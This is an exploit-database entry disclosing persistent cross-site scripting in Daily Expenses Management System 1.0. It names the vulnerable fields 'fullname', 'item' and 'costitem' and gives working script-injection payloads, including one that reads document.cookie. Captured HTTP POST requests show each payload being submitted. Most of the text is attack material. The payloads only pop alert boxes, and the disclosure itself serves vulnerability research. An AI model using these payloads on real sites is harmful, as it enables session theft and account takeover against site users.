id: 34798
date: 08/06/2020
title: Daily Expenses Management System 1.0 Cross Site Scripting Vulnerability
author: Edo Maland
cves: 

# Exploit Title: Daily Expenses Management System 1.0 - Multiple Persistent Cross-Site Scripting
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Software Link:  https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Version: 1.0
# Tested on: XAMPP / Windows 10


-------------------------------------------------------------------------------------------------------------------------------------


# Vulnerability Details
# Feature: Edit Profile
# Description :  A persistent cross-site scripting vulnerability exists within the 'Edit Profile' functionality of application.  
# Vulnerable Parameter : fullname

# POC

Go to url : https://example.com/dets/user-profile.php
Payload : 
  - <img src=xss onerror=alert(document.cookie)>

# Burp Requests

POST /dets/user-profile.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
Origin: https://example.com
DNT: 1
Connection: close
Referer: https://example.com/dets/user-profile.php
Cookie: PHPSESSID=m8d5bbejrmmtvnmm3va3htq8c1
Upgrade-Insecure-Requests: 1

fullname=<img src=xss onerror=alert(document.cookie)>&email=info@xss.id&contactnumber=1313371337&regdate=2020-08-05+13%3A19%3A49&submit=


-------------------------------------------------------------------------------------------------------------------------------------

# Vulnerability Details
# Feature: Add Expenses
# Description :  A persistent cross-site scripting vulnerability exists within the 'Add Expenses' functionality of application.  
# Vulnerable Parameter :
  - item
  - costitem

# POC

Go to url : https://example.com/dets/add-expense.php
Payload : 
  - <img src=xss onerror=alert(document.cookie)>
  - <script>alert(1337)</script>

# Burp Requests

POST /dets/add-expense.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://example.com
DNT: 1
Connection: close
Referer: https://example.com/dets/add-expense.php
Cookie: PHPSESSID=m8d5bbejrmmtvnmm3va3htq8c1
Upgrade-Insecure-Requests: 1

dateexpense=1337-11-11&item=%3Cimg+src%3Dxss+onerror%3Dalert%28document.cookie%29%3E&costitem=%3Cimg+src%3Dxss+onerror%3Dalert%282%29%3E&submit=

#  0day.today [2023-03-22]  #